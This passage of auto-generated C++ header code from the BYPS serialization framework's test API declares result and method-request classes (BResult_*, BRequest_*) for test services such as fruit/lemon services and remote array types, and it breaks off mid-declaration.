// BResult_673917574
// typeId=2098743607
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_673917574 : public BSerializable {
public: byps_ptr< ::std::set< byps::test::api::prim::PPrimitiveTypes > > result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_673917574(byps_ptr< ::std::set< byps::test::api::prim::PPrimitiveTypes > > result = byps_ptr< ::std::set< byps::test::api::prim::PPrimitiveTypes > >()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_7
// typeId=432867941
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_7 : public BSerializable {
public: float result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_7(float result = float()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_7007
// typeId=2076960068
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_7007 : public BSerializable {
public: byps::test::api::srvr::PChatStructure result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_7007(byps::test::api::srvr::PChatStructure result = byps::test::api::srvr::PChatStructure()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_758319514
// typeId=1168951451
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_758319514 : public BSerializable {
public: byps::test::api::prim::PArray4PrimitiveTypes result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_758319514(byps::test::api::prim::PArray4PrimitiveTypes result = byps::test::api::prim::PArray4PrimitiveTypes()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_766441794
// typeId=1167917980
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_766441794 : public BSerializable {
public: PArrayFloat result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_766441794(PArrayFloat result = PArrayFloat()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_769021986
// typeId=580900026
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_769021986 : public BSerializable {
public: PArray4Char result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_769021986(PArray4Char result = PArray4Char()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_8
// typeId=432867940
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_8 : public BSerializable {
public: double result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_8(double result = double()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_846419204
// typeId=167272824
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_846419204 : public BSerializable {
public: PArray4Long result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_846419204(PArray4Long result = PArray4Long()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_8789515
// typeId=323111619
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_8789515 : public BSerializable {
public: byps::PMapFloatCharacter result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_8789515(byps::PMapFloatCharacter result = byps::PMapFloatCharacter()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_9001
// typeId=2076900492
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_9001 : public BSerializable {
public: byps::test::api::refs::PNode result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_9001(byps::test::api::refs::PNode result = byps::test::api::refs::PNode()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_936607009
// typeId=968248604
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_936607009 : public BSerializable {
public: byps::PSetCharacter result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_936607009(byps::PSetCharacter result = byps::PSetCharacter()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_94341197
// typeId=1800858646
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_94341197 : public BSerializable {
public: byps::PMapCharacterFloat result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_94341197(byps::PMapCharacterFloat result = byps::PMapCharacterFloat()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_945713488
// typeId=1852992857
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_945713488 : public BSerializable {
public: PArray4Boolean result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_945713488(PArray4Boolean result = PArray4Boolean()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_949340697
// typeId=996206823
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_949340697 : public BSerializable {
public: byps::test::api::inl::PArray4Point2D result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_949340697(byps::test::api::inl::PArray4Point2D result = byps::test::api::inl::PArray4Point2D()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_955752991
// typeId=695494982
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_955752991 : public BSerializable {
public: byps::test::api::srvr::PClientIF result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_955752991(byps::test::api::srvr::PClientIF result = byps::test::api::srvr::PClientIF()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_BioFruitService_certify
// typeId=1435417025
namespace byps { namespace test { namespace api { namespace inherit {
using namespace ::byps;
class BRequest_BioFruitService_certify : public BMethodRequest {
public: ::std::wstring param;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_BioFruitService_certify();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_BioFruitService_certify(const ::std::wstring& param);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_BioLemonService_useParing
// typeId=2108700976
namespace byps { namespace test { namespace api { namespace inherit {
using namespace ::byps;
class BRequest_BioLemonService_useParing : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_BioLemonService_useParing();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_FruitService_squeeze
// typeId=1290167289
namespace byps { namespace test { namespace api { namespace inherit {
using namespace ::byps;
class BRequest_FruitService_squeeze : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_FruitService_squeeze();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_LemonService_pick
// typeId=1022088379
namespace byps { namespace test { namespace api { namespace inherit {
using namespace ::byps;
class BRequest_LemonService_pick : public BMethodRequest {
public: byps::test::api::auth::PSessionInfo sess;
public: ::std::wstring fromTree;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_LemonService_pick();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_LemonService_pick(const byps::test::api::auth::PSessionInfo& sess, const ::std::wstring& fromTree);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_PlantService_grow
// typeId=695716901
namespace byps { namespace test { namespace api { namespace inherit {
using namespace ::byps;
class BRequest_PlantService_grow : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_PlantService_grow();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes1dim_getBool
// typeId=2033416644
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes1dim_getBool : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes1dim_getBool();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes1dim_getByte
// typeId=2033426402
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes1dim_getByte : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes1dim_getByte();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes1dim_getChar
// typeId=2033439280
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes1dim_getChar : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes1dim_getChar();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes1dim_getDate
// typeId=2033462920
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes1dim_getDate : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes1dim_getDate();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes1dim_getDouble
// typeId=39293909
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes1dim_getDouble : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes1dim_getDouble();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes1dim_getFloat
// typeId=1384988990
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes1dim_getFloat : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes1dim_getFloat();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes1dim_getInt
// typeId=1874061867
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes1dim_getInt : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes1dim_getInt();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes1dim_getLong
// typeId=2033714518
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes1dim_getLong : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes1dim_getLong();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes1dim_getObject
// typeId=263295897
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes1dim_getObject : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes1dim_getObject();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes1dim_getPrimitiveTypes
// typeId=1992537556
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes1dim_getPrimitiveTypes : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes1dim_getPrimitiveTypes();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes1dim_getShort
// typeId=1373101854
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes1dim_getShort : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes1dim_getShort();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes1dim_getString
// typeId=394678379
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes1dim_getString : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes1dim_getString();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes1dim_setBool
// typeId=201441072
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes1dim_setBool : public BMethodRequest {
public: PArrayBoolean v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes1dim_setBool();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteArrayTypes1dim_setBool(const PArrayBoolean& v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes1dim_setByte
// typeId=201431314
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes1dim_setByte : public BMethodRequest {
public: PBytes v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes1dim_setByte();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteArrayTypes1dim_setByte(const PBytes& v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes1dim_setChar
// typeId=201418436
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes1dim_setChar : public BMethodRequest {
public: PArrayChar v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes1dim_setChar();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteArrayTypes1dim_setChar(const PArrayChar& v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes1dim_setDate
// typeId=201394796
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes1dim_setDate : public BMethodRequest {
public: PArrayDate v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes1dim_setDate();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteArrayTypes1dim_setDate(const PArrayDate& v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes1dim_setDouble
// typeId=253910985
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes1dim_setDouble : public BMethodRequest {
public: PArrayDouble v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes1dim_setDouble();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteArrayTypes1dim_setDouble(const PArrayDouble& v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes1dim_setFloat
// typeId=1946101450
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes1dim_setFloat : public BMethodRequest {
public: PArrayFloat v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes1dim_setFloat();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteArrayTypes1dim_setFloat(const PArrayFloat& v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes1dim_setInt
// typeId=1530512055
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes1dim_setInt : public BMethodRequest {
public: PArrayInt v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes1dim_setInt();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteArrayTypes1dim_setInt(const PArrayInt& v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes1dim_setLong
// typeId=201143198
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes1dim_setLong : public BMethodRequest {
public: PArrayLong v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes1dim_setLong();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteArrayTypes1dim_setLong(const PArrayLong& v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes1dim_setObject
// typeId=48678821
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes1dim_setObject : public BMethodRequest {
public: byps::PArrayObject v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes1dim_setObject();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteArrayTypes1dim_setObject(const byps::PArrayObject& v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes1dim_setPrimitiveTypes
// typeId=1362276920
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes1dim_setPrimitiveTypes : public BMethodRequest {
public: byps::test::api::prim::PArrayPrimitiveTypes v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes1dim_setPrimitiveTypes();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteArrayTypes1dim_setPrimitiveTypes(const byps::test::api::prim::PArrayPrimitiveTypes& v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes1dim_setShort
// typeId=1934214314
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes1dim_setShort : public BMethodRequest {
public: PArrayShort v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes1dim_setShort();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteArrayTypes1dim_setShort(const PArrayShort& v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes1dim_setString
// typeId=180061303
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes1dim_setString : public BMethodRequest {
public: PArrayString v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes1dim_setString();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteArrayTypes1dim_setString(const PArrayString& v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes23_sendArraysClass
// typeId=330036060
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes23_sendArraysClass : public BMethodRequest {
public: byps::test::api::prim::PArray2PrimitiveTypes arr2;
public: byps::test::api::prim::PArray3PrimitiveTypes arr3;
public: byps::test::api::prim::PArray4PrimitiveTypes arr4;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes23_sendArraysClass();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteArrayTypes23_sendArraysClass(const byps::test::api::prim::PArray2PrimitiveTypes& arr2, const byps::test::api::prim::PArray3PrimitiveTypes& arr3, const byps::test::api::prim::PArray4PrimitiveTypes& arr4);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes23_sendArraysInline
// typeId=1467243283
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes23_sendArraysInline : public BMethodRequest {
public: byps::test::api::inl::PArray2Point2D arr2;
public: byps::test::api::inl::PArray3Point2D arr3;
public: byps::test::api::inl::PArray4Point2D arr4;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes23_sendArraysInline();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteArrayTypes23_sendArraysInline(const byps::test::api::inl::PArray2Point2D& arr2, const byps::test::api::inl::PArray3Point2D& arr3, const byps::test::api::inl::PArray4Point2D& arr4);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes23_sendArraysInt
// typeId=1828268517
